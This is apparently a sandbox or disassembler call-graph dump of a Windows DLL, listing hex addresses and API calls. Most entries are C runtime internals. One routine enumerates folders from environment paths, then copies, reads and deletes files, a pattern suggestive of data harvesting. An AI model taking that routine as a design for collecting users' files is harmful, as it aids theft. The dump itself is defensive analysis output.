234b7ba8 RtlLeaveCriticalSection 6294->6642 6296 234ba11a 6296->6270 6298 234b5b7a _abort 20 API calls 6297->6298 6299 234b6247 6298->6299 6300 234b62a6 6299->6300 6301 234b6255 6299->6301 6308 234b62bc IsProcessorFeaturePresent 6300->6308 6306 234b2ada _ValidateLocalCookies 5 API calls 6301->6306 6303 234b62ab 6304 234b6231 _abort 26 API calls 6303->6304 6305 234b62b8 6304->6305 6305->6276 6307 234b627c 6306->6307 6307->6276 6309 234b62c7 6308->6309 6312 234b60e2 6309->6312 6313 234b60fe ___scrt_fastfail 6312->6313 6314 234b612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6313->6314 6317 234b61fb ___scrt_fastfail 6314->6317 6315 234b2ada _ValidateLocalCookies 5 API calls 6316 234b6219 GetCurrentProcess TerminateProcess 6315->6316 6316->6303 6317->6315 6319 234b8e2a 6318->6319 6320 234b8e26 6318->6320 6319->6320 6321 234b7a5a 26 API calls 6319->6321 6320->6286 6322 234b8e4a 6321->6322 6346 234b9a22 6322->6346 6325 234b7a7b 6324->6325 6326 234b7a66 6324->6326 6325->6290 6327 234b6368 _free 20 API calls 6326->6327 6328 234b7a6b 6327->6328 6329 234b62ac _abort 26 API calls 6328->6329 6330 234b7a76 6329->6330 6330->6290 6332 234baddd 6331->6332 6333 234badf2 6331->6333 6334 234b6355 __dosmaperr 20 API calls 6332->6334 6335 234bae2d 6333->6335 6340 234bae19 6333->6340 6336 234bade2 6334->6336 6337 234b6355 __dosmaperr 20 API calls 6335->6337 6339 234b6368 _free 20 API calls 6336->6339 6338 234bae32 6337->6338 6341 234b6368 _free 20 API calls 6338->6341 6344 234ba070 6339->6344 6599 234bada6 6340->6599 6343 234bae3a 6341->6343 6345 234b62ac _abort 26 API calls 6343->6345 6344->6287 6344->6293 6345->6344 6347 234b9a2e ___DestructExceptionObject 6346->6347 6348 234b9a4e 6347->6348 6349 234b9a36 6347->6349 6351 234b9aec 6348->6351 6356 234b9a83 6348->6356 6371 234b6355 6349->6371 6353 234b6355 __dosmaperr 20 API calls 6351->6353 6355 234b9af1 6353->6355 6354 234b6368 _free 20 API calls 6364 234b9a43 _abort 6354->6364 6357 234b6368 _free 20 API calls 6355->6357 6374 234b8c7b RtlEnterCriticalSection 6356->6374 6359 234b9af9 6357->6359 6361 234b62ac _abort 26 API calls 6359->6361 6360 234b9a89 6362 234b9aba 6360->6362 6363 234b9aa5 6360->6363 6361->6364 6375 234b9b0d 6362->6375 6365 234b6368 _free 20 API calls 6363->6365 6364->6320 6367 234b9aaa 6365->6367 6369 234b6355 __dosmaperr 20 API calls 6367->6369 6368 234b9ab5 6426 234b9ae4 6368->6426 6369->6368 6372 234b5b7a _abort 20 API calls 6371->6372 6373 234b635a 6372->6373 6373->6354 6374->6360 6376 234b9b3b 6375->6376 6414 234b9b34 6375->6414 6377 234b9b3f 6376->6377 6378 234b9b5e 6376->6378 6380 234b6355 __dosmaperr 20 API calls 6377->6380 6381 234b9baf 6378->6381 6382 234b9b92 6378->6382 6379 234b2ada _ValidateLocalCookies 5 API calls 6383 234b9d15 6379->6383 6384 234b9b44 6380->6384 6386 234b9bc5 6381->6386 6429 234ba00b 6381->6429 6385 234b6355 __dosmaperr 20 API calls 6382->6385 6383->6368 6387 234b6368 _free 20 API calls 6384->6387 6389 234b9b97 6385->6389 6432 234b96b2 6386->6432 6391 234b9b4b 6387->6391 6393 234b6368 _free 20 API calls 6389->6393 6394 234b62ac _abort 26 API calls 6391->6394 6397 234b9b9f 6393->6397 6394->6414 6395 234b9c0c 6401 234b9c20 6395->6401 6402 234b9c66 WriteFile 6395->6402 6396 234b9bd3 6398 234b9bf9 6396->6398 6399 234b9bd7 6396->6399 6400 234b62ac _abort 26 API calls 6397->6400 6444 234b9492 GetConsoleCP 6398->6444 6403 234b9ccd 6399->6403 6439 234b9645 6399->6439 6400->6414 6406 234b9c28 6401->6406 6407 234b9c56 6401->6407 6405 234b9c89 GetLastError 6402->6405 6410 234b9bef 6402->6410 6403->6414 6415 234b6368 _free 20 API calls 6403->6415 6405->6410 6411 234b9c2d 6406->6411 6412 234b9c46 6406->6412 6470 234b9728 6407->6470 6410->6403 6410->6414 6418 234b9ca9 6410->6418 6411->6403 6455 234b9807 6411->6455 6462 234b98f5 6412->6462 6414->6379 6417 234b9cf2 6415->6417 6419 234b6355 __dosmaperr 20 API calls 6417->6419 6420 234b9cb0 6418->6420 6421 234b9cc4 6418->6421 6419->6414 6423 234b6368 _free 20 API calls 6420->6423 6477 234b6332 6421->6477 6424 234b9cb5 6423->6424 6425 234b6355 __dosmaperr 20 API calls 6424->6425 6425->6414 6598 234b8c9e RtlLeaveCriticalSection 6426->6598 6428 234b9aea 6428->6364 6482 234b9f8d 6429->6482 6504 234b8dbc 6432->6504 6434 234b96c2 6435 234b96c7 6434->6435 6513 234b5af6 GetLastError 6434->6513 6435->6395 6435->6396 6437 234b96ea 6437->6435 6438 234b9708 GetConsoleMode 6437->6438 6438->6435 6440 234b969f 6439->6440 6443 234b966a 6439->6443 6440->6410 6441 234ba181 WriteConsoleW CreateFileW 6441->6443 6442 234b96a1 GetLastError 6442->6440 6443->6440 6443->6441 6443->6442 6445 234b9607 6444->6445 6449 234b94f5 6444->6449 6446 234b2ada _ValidateLocalCookies 5 API calls 6445->6446 6448 234b9641 6446->6448 6448->6410 6449->6445 6450 234b957b WideCharToMultiByte 6449->6450 6451 234b79e6 40 API calls __fassign 6449->6451 6454 234b95d2 WriteFile 6449->6454 6577 234b7c19 6449->6577 6450->6445 6452 234b95a1 WriteFile 6450->6452 6451->6449 6452->6449 6453 234b962a GetLastError 6452->6453 6453->6445 6454->6449 6454->6453 6459 234b9816 6455->6459 6456 234b98d8 6458 234b2ada _ValidateLocalCookies 5 API calls 6456->6458 6457 234b9894 WriteFile 6457->6459 6460 234b98da GetLastError 6457->6460 6461 234b98f1 6458->6461 6459->6456 6459->6457 6460->6456 6461->6410 6467 234b9904 6462->6467 6463 234b9a0f 6464 234b2ada _ValidateLocalCookies 5 API calls 6463->6464 6465 234b9a1e 6464->6465 6465->6410 6466 234b9986 WideCharToMultiByte 6468 234b99bb WriteFile 6466->6468 6469 234b9a07 GetLastError 6466->6469 6467->6463 6467->6466 6467->6468 6468->6467 6468->6469 6469->6463 6475 234b9737 6470->6475 6471 234b97ea 6472 234b2ada _ValidateLocalCookies 5 API calls 6471->6472 6474 234b9803 6472->6474 6473 234b97a9 WriteFile 6473->6475 6476 234b97ec GetLastError 6473->6476 6474->6410 6475->6471 6475->6473 6476->6471 6478 234b6355 __dosmaperr 20 API calls 6477->6478 6479 234b633d _free 6478->6479 6480 234b6368 _free 20 API calls 6479->6480 6481 234b6350 6480->6481 6481->6414 6491 234b8d52 6482->6491 6484 234b9f9f 6485 234b9fb8 SetFilePointerEx 6484->6485 6486 234b9fa7 6484->6486 6487 234b9fac 6485->6487 6488 234b9fd0 GetLastError 6485->6488 6489 234b6368 _free 20 API calls 6486->6489 6487->6386 6490 234b6332 __dosmaperr 20 API calls 6488->6490 6489->6487 6490->6487 6492 234b8d5f 6491->6492 6494 234b8d74 6491->6494 6493 234b6355 __dosmaperr 20 API calls 6492->6493 6496 234b8d64 6493->6496 6495 234b6355 __dosmaperr 20 API calls 6494->6495 6499 234b8d99 6494->6499 6497 234b8da4 6495->6497 6498 234b6368 _free 20 API calls 6496->6498 6500 234b6368 _free 20 API calls 6497->6500 6501 234b8d6c 6498->6501 6499->6484 6502 234b8dac 6500->6502 6501->6484 6503 234b62ac _abort 26 API calls 6502->6503 6503->6501 6505 234b8dc9 6504->6505 6506 234b8dd6 6504->6506 6507 234b6368 _free 20 API calls 6505->6507 6509 234b8de2 6506->6509 6510 234b6368 _free 20 API calls 6506->6510 6508 234b8dce 6507->6508 6508->6434 6509->6434 6511 234b8e03 6510->6511 6512 234b62ac _abort 26 API calls 6511->6512 6512->6508 6514 234b5b12 6513->6514 6515 234b5b0c 6513->6515 6516 234b637b _abort 20 API calls 6514->6516 6520 234b5b61 SetLastError 6514->6520 6517 234b5e08 _abort 11 API calls 6515->6517 6518 234b5b24 6516->6518 6517->6514 6519 234b5b2c 6518->6519 6521 234b5e5e _abort 11 API calls 6518->6521 6522 234b571e _free 20 API calls 6519->6522 6520->6437 6523 234b5b41 6521->6523 6524 234b5b32 6522->6524 6523->6519 6525 234b5b48 6523->6525 6526 234b5b6d SetLastError 6524->6526 6527 234b593c _abort 20 API calls 6525->6527 6533 234b55a8 6526->6533 6529 234b5b53 6527->6529 6531 234b571e _free 20 API calls 6529->6531 6532 234b5b5a 6531->6532 6532->6520 6532->6526 6544 234b7613 6533->6544 6536 234b55b8 6538 234b55c2 IsProcessorFeaturePresent 6536->6538 6543 234b55e0 6536->6543 6540 234b55cd 6538->6540 6542 234b60e2 _abort 8 API calls 6540->6542 6542->6543 6574 234b4bc1 6543->6574 6545 234b7581 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6544->6545 6546 234b55ad 6545->6546 6546->6536 6547 234b766e 6546->6547 6548 234b767a _abort 6547->6548 6549 234b5b7a _abort 20 API calls 6548->6549 6553 234b76a7 _abort 6548->6553 6554 234b76a1 _abort 6548->6554 6549->6554 6550 234b76f3 6551 234b6368 _free 20 API calls 6550->6551 6552 234b76f8 6551->6552 6555 234b62ac _abort 26 API calls 6552->6555 6557 234b5671 _abort RtlEnterCriticalSection 6553->6557 6559 234b771f 6553->6559 6554->6550 6554->6553 6573 234b76d6 6554->6573 6555->6573 6556 234bbdc9 _abort 5 API calls 6558 234b7875 6556->6558 6557->6559 6558->6536 6560 234b777e 6559->6560 6562 234b7776 6559->6562 6564 234b56b9 _abort RtlLeaveCriticalSection 6559->6564 6570 234b77a9 6559->6570 6566 234b7665 _abort 38 API calls 6560->6566 6560->6570 6561 234b782e _abort RtlLeaveCriticalSection 6563 234b77fd 6561->6563 6565 234b4bc1 _abort 28 API calls 6562->6565 6567 234b5af6 _abort 38 API calls 6563->6567 6571 234b780c 6563->6571 6563->6573 6564->6562 6565->6560 6568 234b779f 6566->6568 6567->6571 6569 234b7665 _abort 38 API calls 6568->6569 6569->6570 6570->6561 6572 234b5af6 _abort 38 API calls 6571->6572 6571->6573 6572->6573 6573->6556 6575 234b499b _abort 28 API calls 6574->6575 6576 234b4bd2 6575->6576 6578 234b5af6 _abort 38 API calls 6577->6578 6579 234b7c24 6578->6579 6582 234b7a00 6579->6582 6583 234b7a28 6582->6583 6584 234b7a13 6582->6584 6583->6449 6584->6583 6586 234b7f0f 6584->6586 6587 234b7f1b ___DestructExceptionObject 6586->6587 6588 234b5af6 _abort 38 API calls 6587->6588 6589 234b7f24 6588->6589 6590 234b5671 _abort RtlEnterCriticalSection 6589->6590 6591 234b7f72 _abort 6589->6591 6592 234b7f42 6590->6592 6591->6583 6593 234b7f86 __fassign 20 API calls 6592->6593 6594 234b7f56 6593->6594 6595 234b7f75 __fassign RtlLeaveCriticalSection 6594->6595 6596 234b7f69 6595->6596 6596->6591 6597 234b55a8 _abort 38 API calls 6596->6597 6597->6591 6598->6428 6602 234bad24 6599->6602 6601 234badca 6601->6344 6603 234bad30 ___DestructExceptionObject 6602->6603 6613 234b8c7b RtlEnterCriticalSection 6603->6613 6605 234bad3e 6606 234bad70 6605->6606 6607 234bad65 6605->6607 6609 234b6368 _free 20 API calls 6606->6609 6614 234bae4d 6607->6614 6610 234bad6b 6609->6610 6629 234bad9a 6610->6629 6612 234bad8d _abort 6612->6601 6613->6605 6615 234b8d52 26 API calls 6614->6615 6618 234bae5d 6615->6618 6616 234bae63 6632 234b8cc1 6616->6632 6618->6616 6619 234bae95 6618->6619 6622 234b8d52 26 API calls 6618->6622 6619->6616 6620 234b8d52 26 API calls 6619->6620 6623 234baea1 CloseHandle 6620->6623 6625 234bae8c 6622->6625 6623->6616 6626 234baead GetLastError 6623->6626 6624 234baedd 6624->6610 6628 234b8d52 26 API calls 6625->6628 6626->6616 6627 234b6332 __dosmaperr 20 API calls 6627->6624 6628->6619 6641 234b8c9e RtlLeaveCriticalSection 6629->6641 6631 234bada4 6631->6612 6633 234b8cd0 6632->6633 6634 234b8d37 6632->6634 6633->6634 6640 234b8cfa 6633->6640 6635 234b6368 _free 20 API calls 6634->6635 6636 234b8d3c 6635->6636 6637 234b6355 __dosmaperr 20 API calls 6636->6637 6638 234b8d27 6637->6638 6638->6624 6638->6627 6639 234b8d21 SetStdHandle 6639->6638 6640->6638 6640->6639 6641->6631 6642->6296 6643->6273 7578 234b284f 7581 234b2882 7578->7581 7584 234b3550 7581->7584 7583 234b285d 7585 234b355d 7584->7585 7586 234b358a 7584->7586 7585->7586 7587 234b47e5 ___std_exception_copy 21 API calls 7585->7587 7586->7583 7588 234b357a 7587->7588 7588->7586 7590 234b544d 7588->7590 7591 234b5468 7590->7591 7592 234b545a 7590->7592 7593 234b6368 _free 20 API calls 7591->7593 7592->7591 7597 234b547f 7592->7597 7594 234b5470 7593->7594 7595 234b62ac _abort 26 API calls 7594->7595 7596 234b547a 7595->7596 7596->7586 7597->7596 7598 234b6368 _free 20 API calls 7597->7598 7598->7594 7599 234b724e GetProcessHeap 7652 234b220c 7653 234b221a dllmain_dispatch 7652->7653 7654 234b2215 7652->7654 7656 234b22b1 7654->7656 7657 234b22c7 7656->7657 7659 234b22d0 7657->7659 7660 234b2264 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 7657->7660 7659->7653 7660->7659 6644 234baf43 6645 234baf59 6644->6645 6646 234baf4d 6644->6646 6646->6645 6647 234baf52 CloseHandle 6646->6647 6647->6645 6720 234b5303 6723 234b50a5 6720->6723 6732 234b502f 6723->6732 6726 234b502f 5 API calls 6727 234b50c3 6726->6727 6736 234b5000 6727->6736 6730 234b5000 20 API calls 6731 234b50d9 6730->6731 6733 234b5048 6732->6733 6734 234b2ada _ValidateLocalCookies 5 API calls 6733->6734 6735 234b5069 6734->6735 6735->6726 6737 234b500d 6736->6737 6738 234b502a 6736->6738 6739 234b5024 6737->6739 6740 234b571e _free 20 API calls 6737->6740 6738->6730 6741 234b571e _free 20 API calls 6739->6741 6740->6737 6741->6738 6742 234b7103 GetCommandLineA GetCommandLineW 7600 234b8640 7603 234b8657 7600->7603 7604 234b8679 7603->7604 7605 234b8665 7603->7605 7607 234b8693 7604->7607 7608 234b8681 7604->7608 7606 234b6368 _free 20 API calls 7605->7606 7609 234b866a 7606->7609 7611 234b54a7 __fassign 38 API calls 7607->7611 7614 234b8652 7607->7614 7610 234b6368 _free 20 API calls 7608->7610 7612 234b62ac _abort 26 API calls 7609->7612 7613 234b8686 7610->7613 7611->7614 7612->7614 7615 234b62ac _abort 26 API calls 7613->7615 7615->7614 7900 234b7a80 7901 234b7a8d 7900->7901 7902 234b637b _abort 20 API calls 7901->7902 7903 234b7aa7 7902->7903 7904 234b571e _free 20 API calls 7903->7904 7905 234b7ab3 7904->7905 7906 234b637b _abort 20 API calls 7905->7906 7910 234b7ad9 7905->7910 7907 234b7acd 7906->7907 7909 234b571e _free 20 API calls 7907->7909 7908 234b5eb7 11 API calls 7908->7910 7909->7910 7910->7908 7911 234b7ae5 7910->7911 6845 234b7bc7 6846 234b7bd3 ___DestructExceptionObject 6845->6846 6848 234b7c0a _abort 6846->6848 6853 234b5671 RtlEnterCriticalSection 6846->6853 6849 234b7be7 6854 234b7f86 6849->6854 6853->6849 6855 234b7f94 __fassign 6854->6855 6857 234b7bf7 6854->6857 6855->6857 6861 234b7cc2 6855->6861 6858 234b7c10 6857->6858 6975 234b56b9 RtlLeaveCriticalSection 6858->6975 6860 234b7c17 6860->6848 6862 234b7d42 6861->6862 6864 234b7cd8 6861->6864 6865 234b571e _free 20 API calls 6862->6865 6887 234b7d90 6862->6887 6864->6862 6866 234b7d0b 6864->6866 6871 234b571e _free 20 API calls 6864->6871 6867 234b7d64 6865->6867 6868 234b7d2d 6866->6868 6877 234b571e _free 20 API calls 6866->6877 6869 234b571e _free 20 API calls 6867->6869 6870 234b571e _free 20 API calls 6868->6870 6872 234b7d77 6869->6872 6873 234b7d37 6870->6873 6875 234b7d00 6871->6875 6878 234b571e _free 20 API calls 6872->6878 6881 234b571e _free 20 API calls 6873->6881 6874 234b7dfe 6882 234b571e _free 20 API calls 6874->6882 6889 234b90ba 6875->6889 6876 234b7d9e 6876->6874 6888 234b571e 20 API calls _free 6876->6888 6879 234b7d22 6877->6879 6880 234b7d85 6878->6880 6917 234b91b8 6879->6917 6885 234b571e _free 20 API calls 6880->6885 6881->6862 6886 234b7e04 6882->6886 6885->6887 6886->6857 6929 234b7e35 6887->6929 6888->6876 6890 234b90cb 6889->6890 6916 234b91b4 6889->6916 6891 234b90dc 6890->6891 6892 234b571e _free 20 API calls 6890->6892 6893 234b571e _free 20 API calls 6891->6893 6897 234b90ee 6891->6897 6892->6891 6893->6897 6894 234b9100 6896 234b9112 6894->6896 6898 234b571e _free 20 API calls 6894->6898 6895 234b571e _free 20 API calls 6895->6894 6899 234b9124 6896->6899 6900 234b571e _free 20 API calls 6896->6900 6897->6894 6897->6895 6898->6896 6901 234b9136 6899->6901 6902 234b571e _free 20 API calls 6899->6902 6900->6899 6903 234b9148 6901->6903 6904 234b571e _free 20 API calls 6901->6904 6902->6901 6905 234b915a 6903->6905 6906 234b571e _free 20 API calls 6903->6906 6904->6903 6907 234b916c 6905->6907 6908 234b571e _free 20 API calls 6905->6908 6906->6905 6909 234b917e 6907->6909 6910 234b571e _free 20 API calls 6907->6910 6908->6907 6911 234b9190 6909->6911 6912 234b571e _free 20 API calls 6909->6912 6910->6909 6913 234b91a2 6911->6913 6914 234b571e _free 20 API calls 6911->6914 6912->6911 6915 234b571e _free 20 API calls 6913->6915 6913->6916 6914->6913 6915->6916 6916->6866 6918 234b91c5 6917->6918 6928 234b921d 6917->6928 6919 234b91d5 6918->6919 6921 234b571e _free 20 API calls 6918->6921 6920 234b91e7 6919->6920 6922 234b571e _free 20 API calls 6919->6922 6923 234b91f9 6920->6923 6924 234b571e _free 20 API calls 6920->6924 6921->6919 6922->6920 6925 234b920b 6923->6925 6926 234b571e _free 20 API calls 6923->6926 6924->6923 6927 234b571e _free 20 API calls 6925->6927 6925->6928 6926->6925 6927->6928 6928->6868 6930 234b7e60 6929->6930 6931 234b7e42 6929->6931 6930->6876 6931->6930 6935 234b925d 6931->6935 6934 234b571e _free 20 API calls 6934->6930 6936 234b7e5a 6935->6936 6937 234b926e 6935->6937 6936->6934 6971 234b9221 6937->6971 6940 234b9221 __fassign 20 API calls 6941 234b9281 6940->6941 6942 234b9221 __fassign 20 API calls 6941->6942 6943 234b928c 6942->6943 6944 234b9221 __fassign 20 API calls 6943->6944 6945 234b9297 6944->6945 6946 234b9221 __fassign 20 API calls 6945->6946 6947 234b92a5 6946->6947 6948 234b571e _free 20 API calls 6947->6948 6949 234b92b0 6948->6949 6950 234b571e _free 20 API calls 6949->6950 6951 234b92bb 6950->6951 6952 234b571e _free 20 API calls 6951->6952 6953 234b92c6 6952->6953 6954 234b9221 __fassign 20 API calls 6953->6954 6955 234b92d4 6954->6955 6956 234b9221 __fassign 20 API calls 6955->6956 6957 234b92e2 6956->6957 6958 234b9221 __fassign 20 API calls 6957->6958 6959 234b92f3 6958->6959 6960 234b9221 __fassign 20 API calls 6959->6960 6961 234b9301 6960->6961 6962 234b9221 __fassign 20 API calls 6961->6962 6963 234b930f 6962->6963 6964 234b571e _free 20 API calls 6963->6964 6965 234b931a 6964->6965 6966 234b571e _free 20 API calls 6965->6966 6967 234b9325 6966->6967 6968 234b571e _free 20 API calls 6967->6968 6969 234b9330 6968->6969 6970 234b571e _free 20 API calls 6969->6970 6970->6936 6972 234b9258 6971->6972 6974 234b9248 6971->6974 6972->6940 6973 234b571e _free 20 API calls 6973->6974 6974->6972 6974->6973 6975->6860 6976 234ba1c6 IsProcessorFeaturePresent 6648 234ba945 6650 234ba96d 6648->6650 6649 234ba9a5 6650->6649 6651 234ba99e 6650->6651 6652 234ba997 6650->6652 6661 234baa00 6651->6661 6657 234baa17 6652->6657 6658 234baa20 6657->6658 6665 234bb19b 6658->6665 6662 234baa20 6661->6662 6663 234bb19b __startOneArgErrorHandling 21 API calls 6662->6663 6664 234ba9a3 6663->6664 6666 234bb1da __startOneArgErrorHandling 6665->6666 6669 234bb25c __startOneArgErrorHandling 6666->6669 6675 234bb59e 6666->6675 6673 234bb286 6669->6673 6678 234b78a3 6669->6678 6670 234bb292 6672 234b2ada _ValidateLocalCookies 5 API calls 6670->6672 6674 234ba99c 6672->6674 6673->6670 6682 234bb8b2 6673->6682 6689 234bb5c1 6675->6689 6679 234b78cb 6678->6679 6680 234b2ada _ValidateLocalCookies 5 API calls 6679->6680 6681 234b78e8 6680->6681 6681->6673 6683 234bb8bf 6682->6683 6684 234bb8d4 6682->6684 6685 234bb8d9 6683->6685 6687 234b6368 _free 20 API calls 6683->6687 6686 234b6368 _free 20 API calls 6684->6686 6685->6670 6686->6685 6688 234bb8cc 6687->6688 6688->6670 6690 234bb5ec __raise_exc 6689->6690 6691 234bb7e5 RaiseException 6690->6691 6692 234bb5bc 6691->6692 6692->6669 5943 234b1c5b 5944 234b1c6b ___scrt_fastfail 5943->5944 5947 234b12ee 5944->5947 5946 234b1c87 5948 234b1324 ___scrt_fastfail 5947->5948 5949 234b13b7 GetEnvironmentVariableW 5948->5949 5973 234b10f1 5949->5973 5952 234b10f1 57 API calls 5953 234b1465 5952->5953 5954 234b10f1 57 API calls 5953->5954 5955 234b1479 5954->5955 5956 234b10f1 57 API calls 5955->5956 5957 234b148d 5956->5957 5958 234b10f1 57 API calls 5957->5958 5959 234b14a1 5958->5959 5960 234b10f1 57 API calls 5959->5960 5961 234b14b5 lstrlenW 5960->5961 5962 234b14d9 lstrlenW 5961->5962 5963 234b14d2 5961->5963 5964 234b10f1 57 API calls 5962->5964 5963->5946 5965 234b1501 lstrlenW lstrcatW 5964->5965 5966 234b10f1 57 API calls 5965->5966 5967 234b1539 lstrlenW lstrcatW 5966->5967 5968 234b10f1 57 API calls 5967->5968 5969 234b156b lstrlenW lstrcatW 5968->5969 5970 234b10f1 57 API calls 5969->5970 5971 234b159d lstrlenW lstrcatW 5970->5971 5972 234b10f1 57 API calls 5971->5972 5972->5963 5974 234b1118 ___scrt_fastfail 5973->5974 5975 234b1129 lstrlenW 5974->5975 5986 234b2c40 5975->5986 5978 234b1168 lstrlenW 5979 234b1177 lstrlenW FindFirstFileW 5978->5979 5980 234b11e1 5979->5980 5981 234b11a0 5979->5981 5980->5952 5982 234b11aa 5981->5982 5983 234b11c7 FindNextFileW 5981->5983 5982->5983 5988 234b1000 5982->5988 5983->5981 5985 234b11da FindClose 5983->5985 5985->5980 5987 234b1148 lstrcatW lstrlenW 5986->5987 5987->5978 5987->5979 5989 234b1022 ___scrt_fastfail 5988->5989 5990 234b10af 5989->5990 5991 234b102f lstrcatW lstrlenW 5989->5991 5992 234b10b5 lstrlenW 5990->5992 6003 234b10ad 5990->6003 5993 234b106b lstrlenW 5991->5993 5994 234b105a lstrlenW 5991->5994 6019 234b1e16 5992->6019 6005 234b1e89 lstrlenW 5993->6005 5994->5993 5997 234b10ca 6000 234b1e89 5 API calls 5997->6000 5997->6003 5998 234b1088 GetFileAttributesW 5999 234b109c 5998->5999 5998->6003 5999->6003 6011 234b173a 5999->6011 6002 234b10df 6000->6002 6024 234b11ea 6002->6024 6003->5982 6006 234b2c40 ___scrt_fastfail 6005->6006 6007 234b1ea7 lstrcatW lstrlenW 6006->6007 6008 234b1ec2 6007->6008 6009 234b1ed1 lstrcatW 6007->6009 6008->6009 6010 234b1ec7 lstrlenW 6008->6010 6009->5998 6010->6009 6012 234b1747 ___scrt_fastfail 6011->6012 6039 234b1cca 6012->6039 6016 234b199f 6016->6003 6017 234b1824 ___scrt_fastfail _strlen 6017->6016 6059 234b15da 6017->6059 6020 234b1e29 6019->6020 6023 234b1e4c 6019->6023 6021 234b1e2d lstrlenW 6020->6021 6020->6023 6022 234b1e3f lstrlenW 6021->6022 6021->6023 6022->6023 6023->5997 6025 234b120e ___scrt_fastfail 6024->6025 6026 234b1e89 5 API calls 6025->6026 6027 234b1220 GetFileAttributesW 6026->6027 6028 234b1246 6027->6028 6029 234b1235 6027->6029 6030 234b1e89 5 API calls 6028->6030 6029->6028 6031 234b173a 35 API calls 6029->6031 6032 234b1258 6030->6032 6031->6028 6033 234b10f1 56 API calls 6032->6033 6034 234b126d 6033->6034 6035 234b1e89 5 API calls 6034->6035 6036 234b127f ___scrt_fastfail 6035->6036 6037 234b10f1 56 API calls 6036->6037 6038 234b12e6 6037->6038 6038->6003 6040 234b1cf1 ___scrt_fastfail 6039->6040 6041 234b1d0f CopyFileW CreateFileW 6040->6041 6042 234b1d55 GetFileSize 6041->6042 6043 234b1d44 DeleteFileW 6041->6043 6044 234b1ede 22 API calls 6042->6044 6048 234b1808 6043->6048 6045 234b1d66 ReadFile 6044->6045 6046 234b1d7d CloseHandle DeleteFileW 6045->6046 6047 234b1d94 CloseHandle DeleteFileW 6045->6047 6046->6048 6047->6048 6048->6016 6049 234b1ede 6048->6049 6051 234b222f 6049->6051 6052 234b224e 6051->6052 6054 234b2250 6051->6054 6067 234b474f 6051->6067 6072 234b47e5 6051->6072 6052->6017 6055 234b2908 6054->6055 6079 234b35d2 6054->6079 6056 234b35d2 __CxxThrowException@8 RaiseException 6055->6056 6058 234b2925 6056->6058 6058->6017 6060 234b160c _strcat _strlen 6059->6060 6061 234b163c lstrlenW 6060->6061 6167 234b1c9d 6061->6167 6063 234b1655 lstrcatW lstrlenW 6064 234b1678 6063->6064 6065 234b167e lstrcatW 6064->6065 6066 234b1693 ___scrt_fastfail 6064->6066 6065->6066 6066->6017 6082 234b4793 6067->6082 6070 234b478f 6070->6051 6071 234b4765 6088 234b2ada 6071->6088 6078 234b56d0 _abort 6072->6078 6073 234b570e 6101 234b6368 6073->6101 6075 234b56f9 RtlAllocateHeap 6076 234b570c 6075->6076 6075->6078 6076->6051 6077 234b474f _abort 7 API calls 6077->6078 6078->6073 6078->6075 6078->6077 6080 234b35f2 RaiseException 6079->6080 6080->6055 6083 234b479f ___DestructExceptionObject 6082->6083 6095 234b5671 RtlEnterCriticalSection 6083->6095 6085 234b47aa 6096 234b47dc 6085->6096 6087 234b47d1 _abort 6087->6071 6089 234b2ae3 6088->6089 6090 234b2ae5 IsProcessorFeaturePresent 6088->6090 6089->6070 6092 234b2b58 6090->6092 6100 234b2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 6092->6100 6094 234b2c3b 6094->6070 6095->6085 6099 234b56b9 RtlLeaveCriticalSection 6096->6099 6098 234b47e3 6098->6087 6099->6098 6100->6094 6104 234b5b7a GetLastError 6101->6104 6105 234b5b93 6104->6105 6108 234b5b99 6104->6108 6123 234b5e08 6105->6123 6110 234b5bf0 SetLastError 6108->6110 6130 234b637b 6108->6130 6113 234b5bf9 6110->6113 6111 234b5bb3 6137 234b571e 6111->6137 6113->6076 6116 234b5bcf 6150 234b593c 6116->6150 6117 234b5bb9 6119 234b5be7 SetLastError 6117->6119 6119->6113 6121 234b571e _free 17 API calls 6122 234b5be0 6121->6122 6122->6110 6122->6119 6155 234b5c45 6123->6155 6125 234b5e2f 6126 234b5e47 TlsGetValue 6125->6126 6127 234b5e3b 6125->6127 6126->6127 6128 234b2ada _ValidateLocalCookies 5 API calls 6127->6128 6129 234b5e58 6128->6129 6129->6108 6135 234b6388 _abort 6130->6135 6131 234b63c8 6133 234b6368 _free 19 API calls 6131->6133 6132 234b63b3 RtlAllocateHeap 6134 234b5bab 6132->6134 6132->6135 6133->6134 6134->6111 6143 234b5e5e 6134->6143 6135->6131 6135->6132 6136 234b474f _abort 7 API calls 6135->6136 6136->6135 6138 234b5729 HeapFree 6137->6138 6142 234b5752 _free 6137->6142 6139 234b573e 6138->6139 6138->6142 6140 234b6368 _free 18 API calls 6139->6140 6141 234b5744 GetLastError 6140->6141 6141->6142 6142->6117 6144 234b5c45 _abort 5 API calls 6143->6144 6145 234b5e85 6144->6145 6146 234b5ea0 TlsSetValue 6145->6146 6147 234b5e94 6145->6147 6146->6147 6148 234b2ada _ValidateLocalCookies 5 API calls 6147->6148 6149 234b5bc8 6148->6149 6149->6111 6149->6116 6161 234b5914 6150->6161 6156 234b5c75 __crt_fast_encode_pointer 6155->6156 6157 234b5c71 6155->6157 6156->6125 6157->6156 6158 234b5ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 6157->6158 6160 234b5c95 6157->6160 6158->6157 6159 234b5ca1 GetProcAddress 6159->6156 6160->6156 6160->6159 6162 234b5854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 6161->6162 6163 234b5938 6162->6163 6164 234b58c4 6163->6164 6165 234b5758 _abort 20 API calls 6164->6165 6166 234b58e8 6165->6166 6166->6121 6168 234b1ca6 _strlen 6167->6168 6168->6063 7702 234b20db 7705 234b20e7 ___DestructExceptionObject 7702->7705 7703 234b20f6 7704 234b2110 dllmain_raw 7704->7703 7706 234b212a 7704->7706 7705->7703 7705->7704 7708 234b210b 7705->7708 7715 234b1eec 7706->7715 7708->7703 7709 234b2177 7708->7709 7712 234b1eec 31 API calls 7708->7712 7709->7703 7710 234b1eec 31 API calls 7709->7710 7711 234b218a 7710->7711 7711->7703 7713 234b2193 dllmain_raw 7711->7713 7714 234b216d dllmain_raw 7712->7714 7713->7703 7714->7709 7716 234b1f2a dllmain_crt_process_detach 7715->7716 7717 234b1ef7 7715->7717 7724 234b1f06 7716->7724 7718 234b1f1c dllmain_crt_process_attach 7717->7718 7719 234b1efc 7717->7719 7718->7724 7720 234b1f12 